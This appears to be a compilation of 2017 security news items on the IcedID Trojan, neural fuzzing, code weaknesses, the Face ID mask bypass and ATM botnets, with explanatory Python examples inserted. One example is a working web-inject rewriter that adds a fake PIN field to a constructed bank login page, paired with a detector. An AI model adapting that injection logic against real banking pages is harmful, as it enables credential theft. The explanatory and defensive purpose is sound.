Malware researchers at IBM X-Force have spotted a new strain of banking malware, dubbed IcedID, with capabilities similar to established financial threats such as Gozi, Zeus, and Dridex. IcedID does not borrow code from other banking malware, but it implements comparable features.
“Overall, this is similar to other banking Trojans, but that’s also where I see the problem,” says Limor Kessem, executive security advisor for IBM Security.

The banking Trojan was first observed in September in campaigns aimed at banks, payment card providers, mobile service providers, payroll, Webmail, and e-commerce sites in the United States and Canada.

The malware also targeted two major banks in the United Kingdom.

The experts highlighted IcedID's distribution technique, which relies on the Emotet Trojan. Emotet is delivered via spam emails, usually as productivity documents containing malicious macros, and then stays quietly resident so that its operators can use it to drop other payloads, such as IcedID.

IcedID can propagate over a network, which suggests its authors developed it to target large businesses.

“IcedID can propagate over a network. It monitors the victim’s online activity by setting up a local proxy for traffic tunneling, which is a concept reminiscent of the GootKit Trojan. Its attack tactics include both webinjection attacks and sophisticated redirection attacks similar to the scheme used by Dridex and TrickBot.” reads the analysis published by IBM.

The redirection scheme implemented by IcedID is designed to appear as seamless as possible to the victim. It includes displaying the legitimate bank’s URL in the address bar and the bank’s correct SSL certificate by keeping a live connection with the actual bank’s site.

The malware watches for its configured target URLs. When one is requested, it either performs a web injection into the legitimate page or redirects the victim to a fake banking website, where the crooks trick them into submitting their credentials.


The attacker controls the victim’s session and uses social engineering to trick victims into sharing transaction authorization data.
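To make the web-injection mechanism concrete, the following is an added example and not IBM's analysis code or anything from IcedID itself. It models the injection rules in the Zeus-style webinject format (an assumption; the page does not describe IcedID's own config format): a URL glob plus two HTML markers that bracket the injection point. The sample login page, rule and URLs are constructed for the example; the `unexpected_form_fields` check is the kind of bank-side integrity comparison that catches an injected field regardless of how the proxy got into the browser's path.

```python
import fnmatch
import re
from dataclasses import dataclass
from typing import List, Set


@dataclass
class WebInject:
    """One rule in the Zeus-style config format (an assumption for this
    example; IcedID's own format is not described on this page)."""
    url_pattern: str    # glob over the URL the browser requested
    data_before: str    # literal HTML that precedes the injection point
    data_after: str     # literal HTML that follows it ("" = insert right after data_before)
    data_inject: str    # HTML written between the two markers


def apply_webinjects(url: str, html: str, injects: List[WebInject]) -> str:
    """Rewrite a bank page the way a proxy-based Trojan does: only when the URL
    matches a rule, and only when both markers are found in order. A page the
    rule does not fit passes through untouched, which is why the victim sees
    the real URL and certificate and nothing looks wrong."""
    for inj in injects:
        if not fnmatch.fnmatchcase(url, inj.url_pattern):
            continue
        start = html.find(inj.data_before)
        if start == -1:
            continue
        start += len(inj.data_before)
        end = html.find(inj.data_after, start) if inj.data_after else start
        if end == -1:
            continue
        html = html[:start] + inj.data_inject + html[end:]
    return html


INPUT_NAME_RE = re.compile(r'<input\b[^>]*\bname="([^"]+)"', re.IGNORECASE)


def unexpected_form_fields(reference_html: str, served_html: str) -> Set[str]:
    """Detection idea for the bank: compare the form fields the page really
    has with those present in what the browser rendered (e.g. as reported by
    a page-integrity script) and return anything added on the client side."""
    return (set(INPUT_NAME_RE.findall(served_html))
            - set(INPUT_NAME_RE.findall(reference_html)))


# Constructed sample page and rule; no real bank and no real IcedID config.
LOGIN_PAGE = (
    '<form action="/login" method="post">'
    '<input name="user" type="text">'
    '<input name="pass" type="password">'
    '<button type="submit">Sign in</button>'
    '</form>'
)

INJECTS = [WebInject(
    url_pattern="https://*.examplebank.test/login*",
    data_before='<input name="pass" type="password">',
    data_after='<button',
    data_inject='<input name="pin" type="text" placeholder="Card PIN">',
)]

if __name__ == "__main__":
    hit = apply_webinjects("https://online.examplebank.test/login?lang=en", LOGIN_PAGE, INJECTS)
    miss = apply_webinjects("https://online.example.test/login", LOGIN_PAGE, INJECTS)
    print("fields added by the inject:", unexpected_form_fields(LOGIN_PAGE, hit))   # {'pin'}
    print("non-matching URL left untouched:", miss == LOGIN_PAGE)                   # True
```

The extra field asks for data the real form never collects, which is the social-engineering half of the attack; because the rewrite happens in the local proxy, neither the address bar nor the TLS indicator changes, so detection has to come from the page content or from the traffic tunnelling itself rather than from the browser's security UI.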

The level of sophistication of the IcedID malware suggests the attackers belong to a well-structured group. The analysis of comments in IcedID code indicates the attackers are from Russian-speaking regions.

Experts expect the threat to evolve in the near future, for example by adding anti-virtual-machine and anti-analysis techniques along with sandbox evasion.

Further technical details on the malware, including the Indicators of Compromise, are available in the blog post published by IBM.

Microsoft Uses Neural Networks to Improve Fuzzing
14.11.2017 securityweek IT
A team of Microsoft researchers has been working on improving fuzzing techniques by using deep neural networks, and initial tests have shown promising results.

Fuzzing is used to find software vulnerabilities – particularly memory corruption bugs – by injecting malformed or semi-malformed data into the targeted application. If the software crashes or behaves unexpectedly, it could indicate the presence of a security flaw.

There are three broad types of fuzzing: whitebox fuzzing, which uses program analysis of the source or binary (for example symbolic execution) to steer inputs into unexplored paths; blackbox fuzzing, which treats the target as opaque and needs no access to its code; and greybox fuzzing, which sits between the two, using lightweight feedback from previous executions, typically code coverage, to decide which inputs to mutate next.

Experts at Microsoft have attempted to improve this feedback loop using a type of machine learning called deep neural networks (DNN). Neural networks, a set of algorithms modeled after the human brain, are designed to recognize patterns in an effort to help classify and cluster data.

Neural networks have been used by several companies for security-related purposes, including for detecting spam and malware, and even in Apple’s new Face ID feature.

Microsoft researchers have been trying to use neural networks for a learning technique that relies on patterns in previous fuzzing iterations to guide future iterations.

“The neural models learn a function to predict good (and bad) locations in input files to perform fuzzing mutations based on the past mutations and corresponding code coverage information,” the researchers said.

The method has been implemented in American Fuzzy Lop (AFL), a popular open source fuzzer developed by Google researcher Michal Zalewski. Tests were conducted against parsers for the ELF, PDF, PNG and XML file formats.

The tests showed significant improvements in the results obtained with the neural AFL compared to the original AFL, except for PDF files, which experts believe may be too large. Improvements were seen in terms of code coverage, unique code paths and crashes.
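The feedback loop described above, as an added illustration that is not Microsoft's neural AFL or any code from the paper: a minimal greybox fuzzer whose "model" is just a per-offset weight table, bumped whenever mutating that byte offset produced new coverage, so productive locations get mutated more often. That lookup table is a deliberately crude stand-in for the neural network the researchers trained; the toy "FZ" container format, its parser and the seed input are constructed for this example, and the set of branch labels the parser returns stands in for the edge-coverage bitmap AFL collects through instrumentation.

```python
import random
from typing import Dict, List, Set, Tuple


def toy_parser(data: bytes) -> Set[str]:
    """Parser for a made-up 'FZ' container format (constructed for this example).
    Returns the set of branch labels it executed, standing in for the edge
    coverage AFL collects through compile-time instrumentation."""
    cov: Set[str] = set()
    if len(data) < 4:
        cov.add("short")
        return cov
    if data[:2] == b"FZ":
        cov.add("magic_ok")
        version = data[2]
        if version == 1:
            cov.add("v1")
        elif version == 2:
            cov.add("v2")
        else:
            cov.add("v_unknown")
    else:
        cov.add("magic_bad")
    length = data[3]
    if length > len(data) - 4:
        cov.add("len_overflow")      # a real C parser would read past the buffer here
    else:
        cov.add("len_ok")
        payload = data[4:4 + length]
        if payload.count(0xFF) > 2:
            cov.add("ff_run")
    return cov


def run_fuzzer(seed_input: bytes, iterations: int, rng_seed: int = 1
               ) -> Tuple[Set[str], Dict[int, float], List[bytes]]:
    """Greybox fuzzing loop. The 'learned model' is the weights table: byte
    offsets whose mutation yielded new coverage are chosen more often later.
    This is the location-prediction idea from the quoted research reduced to a
    lookup table instead of a neural network."""
    rng = random.Random(rng_seed)
    corpus: List[bytes] = [seed_input]
    total_cov = set(toy_parser(seed_input))
    weights: Dict[int, float] = {}           # byte offset -> productivity score

    for _ in range(iterations):
        child = bytearray(rng.choice(corpus))
        if rng.random() < 0.1:               # occasionally grow the input
            child.append(rng.randrange(256))
        offsets = list(range(len(child)))
        pos = rng.choices(offsets, weights=[weights.get(i, 1.0) for i in offsets])[0]
        child[pos] = rng.randrange(256)      # single-byte overwrite at the chosen offset

        cov = toy_parser(bytes(child))
        new = cov - total_cov
        if new:                              # new coverage: keep the input, reward the offset
            total_cov |= new
            corpus.append(bytes(child))
            weights[pos] = weights.get(pos, 1.0) + len(new)
    return total_cov, weights, corpus


if __name__ == "__main__":
    cov, weights, corpus = run_fuzzer(b"FZ\x01\x00", 2000)
    print("coverage:", sorted(cov))
    print("offset weights:", weights)
    print("corpus size:", len(corpus))
```

After a run the weights for the version and length offsets are typically the highest, because those are the bytes the parser branches on; in the research, the neural model learns the same thing from the mutation history and coverage maps, but generalises it across inputs of a format rather than memorising offsets of one seed.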

The team behind the project believes this approach can be applied to any fuzzer, not just AFL.

“We believe our neural fuzzing research project is just scratching the surface of what can be achieved using deep neural networks for fuzzing,” explained Microsoft’s William Blum. “Right now, our model only learns fuzzing locations, but we could also use it to learn other fuzzing parameters such as the type of mutation or strategy to apply. We are also considering online versions of our machine learning model, in which the fuzzer constantly learns from ongoing fuzzing iterations.”

Blum is the lead of the engineering team for Microsoft Security Risk Detection, a recently launched cloud-based fuzzing service that uses artificial intelligence to find bugs and vulnerabilities in applications. The results of the research into the use of neural networks for fuzzing could help improve this service.

Another recently launched Microsoft tool designed for finding memory corruption bugs, VulnScan, might also be added to the Security Risk Detection service.

Financial Services Has Most Code Vulnerabilities of All Industries: Analysis
14.11.2017 securityweek
Last week, the Securities Industry and Financial Markets Association (SIFMA) ran Quantum Dawn IV to test the resiliency and response of the financial services industry to a major cyber incident. Today, a new CAST report on application security health (CRASH) highlights that finance has some of the worst code -- in security terms -- of all the major industry sectors.

The details come from the CAST Software CRASH Report on Application Security (PDF). CAST analyzed 278 million lines of code from 1,388 applications and found 1.3 million CWE (MITRE's Common Weakness Enumeration) weaknesses in code developed under .NET and Java EE. The implication is that the banking sector will need to take considerable care in the implementation of Europe's open banking regulation (PSD2) due to come into force in January 2018. It will need to ensure that third-parties do not implement insecure code with access to banking code that already has a higher than average density of its own coding flaws.

CAST specifically analyzed code developed across ten different industry sectors within .NET and Java EE environments. It found a significantly different density of CWEs between the two environments, with .NET code generally having a greater density of weaknesses than Java EE, in some cases more than 35 CWE weaknesses per KLOC (1,000 lines of code). A CWE entry classifies a type of coding weakness that an attacker could potentially exploit, such as a buffer overflow, a SQL injection (SQLi) or a cross-site scripting (XSS) flaw.

Financial services, Telecom and IT Consulting had the highest mean CWE densities. Energy and Utilities had the lowest CWE densities.

CAST also noted a difference between Waterfall coding and Agile coding -- with agile coding tending to introduce fewer weaknesses.

CAST's chief scientist, Bill Curtis, told SecurityWeek that while the Waterfall approach of defining and designing the entire project upfront is theoretically a good idea, business pressures -- with senior management requiring amendments in progress -- often make its actual implementation less than perfect. This in turn leads to additional work requirements and rushed deadlines introducing additional weaknesses.

In general, fewer CWE weaknesses are found in Java EE developments that use an agile approach; that is, building the project while still in development, adding new features as required by senior management, and releasing new versions as soon as they are ready. This can be taken too far: a high number of releases (more than six per year) tends to introduce a higher number of weaknesses, which could indicate a business prioritizing new features and rapid releases over secure coding. Security needs to be built into the process rather than added on to the application.

Nevertheless, there is still a surprisingly high density of weaknesses found in all applications across all industry sectors. Curtis would personally recommend a hybrid approach: using a waterfall approach to get the architecture right from the beginning, but an agile approach to delivering code.

He sees the real problem as a lack of discipline in coding that is itself the result of a lack of adequately qualified programmers. The rush to digitizing all aspects of business has placed a severe strain on the available supply of programmers -- schools and colleges simply cannot produce new programmers as fast as necessary. Furthermore, the coders that are provided tend not to have any formal training in 'secure coding'.

The under-supply of programmers has led to the development of the off-shore programming industry, especially in India. CAST's analysis shows no real difference in the number of CWEs between on-shore and off-shore coding. However, Curtis told SecurityWeek that the continuing growth of demand has already absorbed the top layer of programmers from the off-shore industry, and less able programmers are beginning to be employed.

He does not, however, believe that the growth in demand will inevitably lead to increasing security weaknesses in the code. Companies will always need to select the best programmers they can find to employ, but now need to provide additional in-house training for secure coding. This approach coupled with automated static code analysis would improve the quality of new applications -- and help strengthen the security of existing applications.
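As an added example of the kind of check the static code analysis mentioned above performs (not CAST's own rules, which the report does not publish), the following scans Python source for one CWE class, CWE-89 SQL injection, by looking for database `execute` calls whose query string is built at runtime, then expresses the hits as a density per KLOC like the report does. The sample source with three query helpers is constructed for the example; the choice of Python rather than the .NET and Java EE code CAST measured is for runnability, the pattern is the same.

```python
import ast
from dataclasses import dataclass
from typing import List


@dataclass
class Finding:
    cwe: str
    line: int
    detail: str


# Constructed sample, not from the CAST report: two helpers build SQL from
# user input (concatenation and an f-string), one uses a bound parameter.
SAMPLE_SOURCE = '''\
import sqlite3

def find_user_concat(conn, name):
    cur = conn.cursor()
    cur.execute("SELECT id FROM users WHERE name = '" + name + "'")
    return cur.fetchone()

def find_user_fstring(conn, name):
    return conn.execute(f"SELECT id FROM users WHERE name = '{name}'").fetchone()

def find_user_safe(conn, name):
    return conn.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchone()
'''

SQL_SINKS = {"execute", "executemany", "executescript"}   # DB-API query entry points


def _is_dynamic_string(node: ast.AST) -> bool:
    """True if the expression builds a string at runtime: f-string,
    concatenation, %-formatting or str.format()."""
    if isinstance(node, ast.JoinedStr):
        return True
    if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Mod)):
        return True
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
            and node.func.attr == "format"):
        return True
    return False


def find_sqli_candidates(source: str) -> List[Finding]:
    """Flag every SQL sink whose first argument is a runtime-built string.
    A constant query (even one later given bound parameters) is not flagged."""
    findings: List[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and node.func.attr in SQL_SINKS
                and node.args
                and _is_dynamic_string(node.args[0])):
            findings.append(Finding(
                "CWE-89", node.lineno,
                f"{node.func.attr}() called with a SQL string built at runtime"))
    return sorted(findings, key=lambda f: f.line)


def weakness_density_per_kloc(source: str, findings: List[Finding]) -> float:
    """Weaknesses per 1,000 non-blank lines, the unit the CRASH report uses."""
    loc = sum(1 for line in source.splitlines() if line.strip())
    return len(findings) / loc * 1000 if loc else 0.0


if __name__ == "__main__":
    hits = find_sqli_candidates(SAMPLE_SOURCE)
    for f in hits:
        print(f"{f.cwe} line {f.line}: {f.detail}")
    print("density per KLOC:", round(weakness_density_per_kloc(SAMPLE_SOURCE, hits), 1))
```

This pattern-level check is what makes such tools cheap to run in a build, and also why they miss cases: a query string assembled in one function and executed in another needs data-flow (taint) tracking to follow the user input to the sink, which is the main thing commercial analyzers add on top of rules like this one.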

In the meantime, he believes that school education needs to change. At the moment it concentrates on teaching youngsters reading, writing and arithmetic. He believes that basic coding should be given similar emphasis to reading and writing. In the future, schools may need to discuss elegant routines in the same way as they currently discuss Shakespearean metaphors.

ThreatQuotient Raises $30 Million in Series C Funding
14.11.2017 securityweek IT
Threat intelligence platform provider ThreatQuotient announced on Monday that it has raised $30 million in Series C funding, bringing the total amount raised by the company to $54 million to date.

Founded in 2013 by Wayne Chiang and Ryan Trost, who previously worked in a security operations center at defense contractor General Dynamics, ThreatQuotient offers a threat intelligence platform that helps customers manage and correlate external sources with their internal analytics solutions for contextual, operationalized intelligence.

According to the Reston, Virginia-based company, the funding will be used to fuel product development and support sales and marketing efforts for global expansion.

The company’s ThreatQ platform allows security analysts to leverage a threat library, an adaptive workbench, and an open API exchange to provide threat intelligence that is timely, accurate and relevant to their business.

ThreatQuotient claims that its platform eliminates the need for a security analyst to go through an entire pool of data to identify a threat by automating the process and suggesting sources of data that are more relevant to a given client.

“Our industry is at a crossroads and organizations must shift beyond simple detection and response to a position of understanding and anticipating threats through intelligence-driven security,” said John Czupak, President and CEO of ThreatQuotient.

The Series C round was led by Adams Street Partners, while strategic partners Cisco Investments and NTT DOCOMO Ventures joined existing investor New Enterprise Associates (NEA), and growth capital partner Silicon Valley Bank in the financing.

Fred Wang, a partner of the Venture/Growth Team at Adams Street Partners, will join ThreatQuotient's board of directors.

iPhone X's Face ID Bypassed by a Mask
13.11.2017 securityweek Apple
Face ID, the facial biometric unlocking technology included in Apple’s recently launched iPhone X, can be bypassed using a mask, security researchers have discovered.

When revealing the new iPhone X in early September, Apple said that the probability of a random person unlocking a phone with Face ID was about 1 in 1,000,000, day or night, and that professional mask makers and makeup artists in Hollywood helped train the artificial intelligence behind the feature to resist attempts to bypass it.

The feature, however, raised concerns over the use of facial recognition becoming the norm and opening the door to new ways to abuse it. Some even feared that it would result in advertisers and law enforcement being able to track people’s whereabouts much easier.

At the same time, many questioned how effective Face ID would be at keeping intruders out of the device. And while some earlier attempts to trick the feature appear to have failed, Face ID was successfully bypassed with a mask created by Bkav, a Vietnamese company active in network security, software, smartphone manufacturing and smart home products.

“One week after iPhone X officially went on sale, Bkav security experts from Vietnam show that Face ID can be fooled by a mask, which means it is not an effective security measure,” the company says.

The mask used by the researchers combined 3D-printed elements, a hand-made nose, 2D-printed elements for some parts, and hand-made skin to trick Apple’s AI. The total cost to produce the mask was $150, the researchers say.

“The mask is crafted by combining 3D printing with makeup and 2D images, besides some special processing on the cheeks and around the face, where there are large skin areas, to fool AI of Face ID,” Ngo Tuan Anh, Bkav's Vice President of Cyber Security, said.

The security researchers claim that the purpose of their experiment was to show that facial recognition isn’t mature enough to be used in widely available devices even after 10 years of development. In 2008, Bkav demonstrated that face recognition was not an effective security measure for laptops, after manufacturers started using the technology in their products.

Although they say it’s actually easy to create a mask and beat Face ID, the researchers admit that their knowledge of how Apple’s AI works and what they could do to bypass it helped them in creating a proof of concept. The researchers claim that Apple appears to rely on the Face ID’s AI too much for the recognition process, which allows one to unlock the device even with half of their face covered.

“Potential targets shall not be regular users, but billionaires, leaders of major corporations, nation leaders and agents like FBI need to understand the Face ID's issue. Security units' competitors, commercial rivals of corporations, and even nations might benefit from our PoC,” Bkav says.

The researchers note that the mask was an experiment meant to prove a point, and that it was a successful experiment. They also revealed that they started working on the mask as soon as they received their iPhone X device on November 5 and that they plan on publishing full details related to how they built the mask.

“As for biometric security, fingerprint is the best,” the company concludes.

Until full details on the experiment are published, some questions remain unanswered, such as whether they used the dimensions of a real person’s face when creating the mask or if the attack was attempted with a fresh unlock.

Further details on how the experiment was set up are also required, such as whether the device was trained with the mask or not, and the number of attempts they used until successfully unlocking the phone.

SecurityWeek reached out to Apple for comment on Bkav’s findings, but the company redirected us to its Knowledge Base article on Face ID, where the additional security measures are detailed. There, Apple explains that setting up Face ID requires a passcode and that the passcode is requested after five unsuccessful attempts to match a face or if the device hasn’t been unlocked for more than 48 hours.

The passcode is also requested if it “hasn’t been used to unlock the device in the last six and a half days and Face ID hasn't unlocked the device in the last 4 hours,” Apple says.
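Those fallback rules bound what any mask attack can achieve, which is why the number of attempts Bkav needed matters. The following is an added example, not Apple's code and not derived from iOS: it models only the conditions quoted above (Apple's article lists further triggers, such as a restart, that the text does not quote) and answers, for a given device state, whether Face ID can even be presented with a mask and how many presentations remain before lockout. The reference time and sample states are constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

MAX_FAILED_ATTEMPTS = 5                       # quoted: passcode after five failed matches
NO_UNLOCK_WINDOW = timedelta(hours=48)        # quoted: not unlocked for more than 48 hours
PASSCODE_STALE = timedelta(days=6, hours=12)  # quoted: passcode unused for 6.5 days ...
FACEID_STALE = timedelta(hours=4)             # ... and Face ID unused for 4 hours


@dataclass
class UnlockState:
    now: datetime
    failed_face_attempts: int                 # consecutive failed Face ID matches
    last_unlock: Optional[datetime]           # last unlock by any method
    last_passcode_unlock: Optional[datetime]
    last_faceid_unlock: Optional[datetime]


def passcode_required(s: UnlockState) -> Optional[str]:
    """Return the quoted rule that forces a passcode, or None if Face ID may
    still be attempted. Only the conditions quoted from Apple's article are
    modelled here (assumption: they are evaluated in this order)."""
    if s.failed_face_attempts >= MAX_FAILED_ATTEMPTS:
        return "five failed Face ID attempts"
    if s.last_unlock is None or s.now - s.last_unlock > NO_UNLOCK_WINDOW:
        return "not unlocked for more than 48 hours"
    passcode_stale = (s.last_passcode_unlock is None
                      or s.now - s.last_passcode_unlock > PASSCODE_STALE)
    faceid_stale = (s.last_faceid_unlock is None
                    or s.now - s.last_faceid_unlock > FACEID_STALE)
    if passcode_stale and faceid_stale:
        return "passcode unused for 6.5 days and Face ID unused for 4 hours"
    return None


def attempts_left(s: UnlockState) -> int:
    """How many more face presentations an attacker gets before lockout."""
    return max(0, MAX_FAILED_ATTEMPTS - s.failed_face_attempts)


def make_state(failed_attempts: int, hours_since_unlock: float,
               hours_since_passcode: float, hours_since_faceid: float) -> UnlockState:
    """Builder around a fixed reference time (constructed sample data)."""
    now = datetime(2017, 11, 13, 9, 0)

    def ago(hours: float) -> datetime:
        return now - timedelta(hours=hours)

    return UnlockState(now, failed_attempts, ago(hours_since_unlock),
                       ago(hours_since_passcode), ago(hours_since_faceid))


if __name__ == "__main__":
    # A phone last used an hour ago with Face ID: a mask may be presented.
    s = make_state(failed_attempts=0, hours_since_unlock=1,
                   hours_since_passcode=30, hours_since_faceid=1)
    print("passcode required:", passcode_required(s), "| attempts left:", attempts_left(s))
    # The same phone after a weekend in a drawer: the mask never gets a chance.
    s = make_state(0, 60, 60, 60)
    print("passcode required:", passcode_required(s))
```

The practical reading is that a stolen phone is only exposed to a mask within the first 48 hours, and that a researcher with five failures per trial, as opposed to one who has enrolled or re-tried freely, has little room for a mask that is only approximately right; those are exactly the open questions about Bkav's setup raised above.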

Google to Ban Android Apps Misusing Accessibility Service
13.11.2017 securityweek Android
Following an increase in Android malware and adware that abuse accessibility services, Google has decided to take action against all apps that misuse the feature.

Much of the adware and malware that makes it onto the Google Play store abuses the BIND_ACCESSIBILITY_SERVICE permission. The permission is designed to allow apps to assist users with disabilities, but malware developers have found ways to misuse it in order to obtain device administrator privileges and conduct other malicious activities without raising suspicion.

One example is TOASTAMIGO, a piece of malware that exploits a recently patched vulnerability affecting the Toast feature in Android.

In an effort to prevent abuse, Google has decided that accessibility services should only be used to help people with disabilities. The tech giant has started contacting developers whose applications use the BIND_ACCESSIBILITY_SERVICE permission and informed them of the steps they need to take.

Developers who use the aforementioned permission to help people with disabilities must clearly state this in the app’s description on Google Play, and they must describe the functionality provided by the Accessibility Service permission. All other developers will have to remove the permission from their products within 30 days or risk having their apps pulled from the official app store.
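The declaration Google is policing lives in the app manifest: an accessibility service is a `<service>` protected by `android.permission.BIND_ACCESSIBILITY_SERVICE` with an intent filter for the `android.accessibilityservice.AccessibilityService` action. The following is an added example, not Google's tooling, that audits a decoded manifest for such services; it is the check a reviewer or app-vetting pipeline runs to find what an app actually declares, as opposed to what its store listing says. The manifest below is constructed (three services: one declared correctly, one with the action but not the permission, one unrelated). Real APKs carry the manifest as binary XML, so decode it first with apktool or androguard.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

ANDROID_NS = "http://schemas.android.com/apk/res/android"
BIND_PERM = "android.permission.BIND_ACCESSIBILITY_SERVICE"
A11Y_ACTION = "android.accessibilityservice.AccessibilityService"

# Constructed sample manifest; package and service names are made up.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app">
  <application>
    <service android:name=".HelperService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
      <meta-data android:name="android.accessibilityservice"
                 android:resource="@xml/helper_config"/>
    </service>
    <service android:name=".BrokenA11yService">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
    <service android:name=".SyncService"/>
  </application>
</manifest>
"""


def _attr(el: ET.Element, name: str):
    """Read an attribute from the android: namespace."""
    return el.get(f"{{{ANDROID_NS}}}{name}")


def accessibility_services(manifest_xml: str) -> List[Dict[str, object]]:
    """List every <service> that is, or tries to be, an accessibility service.
    Services with only one half of the declaration are reported too: the
    system will not bind them, but their presence still tells the reviewer
    what the developer intended."""
    root = ET.fromstring(manifest_xml)
    found: List[Dict[str, object]] = []
    for svc in root.iter("service"):
        actions = {_attr(a, "name") for a in svc.iter("action")}
        has_perm = _attr(svc, "permission") == BIND_PERM
        has_action = A11Y_ACTION in actions
        if has_perm or has_action:
            found.append({
                "name": _attr(svc, "name"),
                "permission": has_perm,
                "intent_filter": has_action,
                "properly_declared": has_perm and has_action,
            })
    return found


if __name__ == "__main__":
    for svc in accessibility_services(SAMPLE_MANIFEST):
        status = "accessibility service" if svc["properly_declared"] else "incomplete declaration"
        print(f"{svc['name']}: {status}")
```

The manifest only says that an app can receive accessibility events; what it does with them (reading screen content, injecting taps to grant itself device-admin rights) is in the service's code, so a hit here is the starting point for review, not the verdict.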

“Alternatively, you can choose to unpublish the app,” Google told developers. “All violations are tracked. Serious or repeated violations of any nature will result in the termination of your developer account, and investigation and possible termination of related Google accounts.”

Many users and developers have raised concerns regarding Google’s decision, pointing out that legitimate apps often use the Accessibility Service as a workaround for features that otherwise might be difficult or impossible to implement.

Popular applications such as the LastPass password manager are set to lose important functionality if Google moves forward with its decision. There is also a lot of concern regarding the automation app Tasker, which is not specifically designed for individuals with disabilities, but which appears to be of great aid to some people with Parkinson's disease and Asperger syndrome.

Some have offered advice on how app developers may be able to bypass the new restrictions, and shared thoughts on what alternative routes Google could take to prevent abuse while allowing legitimate apps to continue using the service.

Creating ATM Botnets Not Difficult, Researchers Say
13.11.2017 securityweek BotNet
ATMs Are Not Immune to Supply Chain Attacks and Other Digital Threats

Internet-connected automated teller machines (ATMs) can be discovered using dedicated search engines and specific keywords and then ensnared into botnets, Kaspersky Lab researchers believe.

With large sums of cash being loaded into ATMs on a daily basis, it’s no wonder that these devices are targeted by cybercriminals. And while some crooks take a blunt approach to getting into an ATM, using physical force, others prefer targeting the software running on the machine to make it spill out the cash, Kaspersky’s Olga Kochetova and Alexey Osipov explained at the DefCamp 2017 security conference in Bucharest last week.

There's no denying that ATMs run vulnerable software, they say. Many of the machines run the outdated, already retired Windows XP, meaning they are vulnerable by default, while others might have some unnecessary but flawed applications running on them, such as TeamViewer or an older, flawed variant of Adobe Acrobat Reader.

What’s more, banks often do not keep their ATMs updated, which also makes them vulnerable to malware and other types of attacks, the researchers say. Security inside the ATM is usually poor, and the parts of the chain protecting the cash are not secured separately, meaning that the entire chain can be compromised once a single part is exploited.

Accessing the software running on an ATM provides malicious actors with control over the cash cassettes inside the machine, thus allowing them to extract the cash. However, access to a single machine could also provide the actor with the ability to compromise the bank’s entire network of ATMs, Kaspersky’s researchers say.

There are multiple ways in which an attacker could achieve this, Kochetova and Osipov told SecurityWeek during a private talk at the DefCamp conference: by physically accessing an ATM to install a device in it, by compromising the computers that oversee the bank’s ATMs, and even by a supply-chain attack that focuses on the firmware that vendors or maintenance teams install on the machines.

“With access to an ATM, an actor could install a device in one ATM to send commands to all machines in the network. These commands would look like they come from the central command center. The actor can then use blank cards, or any cards, and withdraw cash from any ATM in the network,” the researchers explained.

This is possible because all of a bank’s ATMs are typically connected to a flat network, which means that every machine in the network can see all other connected machines. Thus, if the attacker’s device is implanted in an ATM directly connected to the network cable, it could allow the attacker to remotely control the machines. It is a classic example of a man-in-the-middle (MitM) attack, the researchers say.

They also pointed out that all evidence would disappear once the malicious device has been extracted from the ATM. Although a possibility, no such botnet has been observed to date. What has been seen, however, was a bank’s network being infected with an information stealer.

“This can be seen as a kind of an ATM botnet, since all machines were infected and the actor was remotely collecting data from them,” Kochetova said. “It is also possible that some crooks somewhere in the world are preparing an attack with money-withdrawal malware instead of sniffers,” she continued.

Attackers could also remove the VPN device from an ATM and connect to the bank’s network through it without anyone noticing, Osipov explained. Such VPN devices are designed to work regardless of the host machine, so the attacker could use one with their own computer.

One other effective method of infiltrating ATM networks is to discover the machines that are online using specialized search engines such as Shodan, the researchers say. Although banks usually claim that no ATM is online, these devices can be easily found if the right keywords or phrases are used to perform the search, Kochetova and Osipov explained.

While the attack vector has been used before (specialized search engines can be used to discover vulnerable Internet of Things (IoT) devices, unsecured databases, and other types of Internet-facing devices), it is relatively new when it comes to finding ATMs.

Once they have discovered the online ATMs, the malicious actor can start checking for open ports and then attempt to compromise machines using known exploits. Thus, attackers could install information-stealing malware on the ATMs or ensnare them into botnets.

Infecting workstations inside the bank and then expanding the footprint to the entire network, including ATMs, is another compromise technique that attackers (such as the Cobalt hacking group) are using.

Recent attacks such as CCleaner and NotPetya have demonstrated the impact supply-chain attacks can have on a global scale, and Kaspersky’s researchers say that ATMs aren’t safe from this type of assault either. To be successful, the attacker would target the “golden image” used to install the operating system and all running software on an ATM.

“We already observed incidents where ordinary malware ended up on an ATM through an infected USB drive that a technician connected to the machine. Thus, if an infected ‘golden image’ is used, the technician would never even notice the compromise. Of course, the attacker would have to know what specific software to install on that ‘golden image’ to compromise the ATMs without being noticed,” Osipov said.

“The same would happen if a service provider is used as a vector of attack. No one would notice the compromise,” he also said.

An ATM botnet could also be used to mine crypto-currency. Crypto miners have become highly popular over the past few years, and an increasing number of malicious attacks focused on deploying such software has been observed this year. Because they have computing power, ATMs can be used for mining too.

“In the end, every ATM is yet another type of computer. This means it can be hacked if the right vulnerabilities are discovered,” Kochetova pointed out. “It is the same as with CCTV cameras that are infected to create IoT botnets,” she concluded.

VMware Patches Vulnerabilities in vCenter Server
13.11.2017 securityweek
The VMware vCenter Server management software is affected by two moderate-severity vulnerabilities that can be exploited for information disclosure and remote denial-of-service (DoS) attacks.

The first flaw, tracked as CVE-2017-4927, is related to how vCenter Server handles specially crafted LDAP network packets. An attacker can exploit the vulnerability remotely to cause a DoS condition.

The vulnerability was discovered by a Fortinet researcher in January, but it was only confirmed in April and patched some months later. Fortinet has published its own advisory for the security hole and assigned it a risk rating of 3/5.

The issue affects vCenter Server 6.0 and 6.5 on any platform and it has been addressed with the release of versions 6.0 U3c and 6.5 U1.

The second vulnerability, CVE-2017-4928, affects the Flash-based vSphere Web Client; VMware pointed out that the HTML5-based application is not affected.

This CVE identifier has actually been assigned to two weaknesses discovered by a Tencent researcher in the product: a server-side request forgery (SSRF) issue and a CRLF injection bug.

